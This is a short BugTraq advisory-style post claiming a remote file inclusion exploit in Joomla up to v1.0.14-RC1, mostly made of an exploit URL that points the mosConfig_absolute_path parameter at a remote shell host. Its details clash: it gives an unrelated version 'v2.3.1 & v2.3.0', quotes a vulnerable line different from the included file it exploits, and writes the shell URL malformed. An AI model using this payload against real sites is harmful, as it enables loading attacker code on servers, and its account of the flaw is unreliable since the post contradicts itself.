BugTraq
Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit Feb 08 2008 03:49PM
alex_zooz_zooz hotmail com
#=======================================================================
=======================

#Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit

#=======================================================================
========================

#

#Critical Level : Dangerous

#

#

#

#Version : v2.3.1 & v2.3.0

#

#=======================================================================
=========================

#Bug in : Index.php

#

#Vlu Code :

#--------------------------------

# include_once($config['path_src_include'] . "common.inc.php");

#

#

#=======================================================================
=========================

#

#Exploit :include( $mosConfig_absolute_path .'/offlinebar.php'

#--------------------------------

#

#http://sitename.com/[Script Path]/index.php?mosConfig_absolute_path=http//www.shellurl.com.com

#

#

#=======================================================================
=========================

#Discoverd By : Fegla

#

#Conatact : alex_zooz_zooz[at]hotmail.com

#

#GreetZ : Sub-Code ,ShikaA , Wizard CC

========================================================================
==========================

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus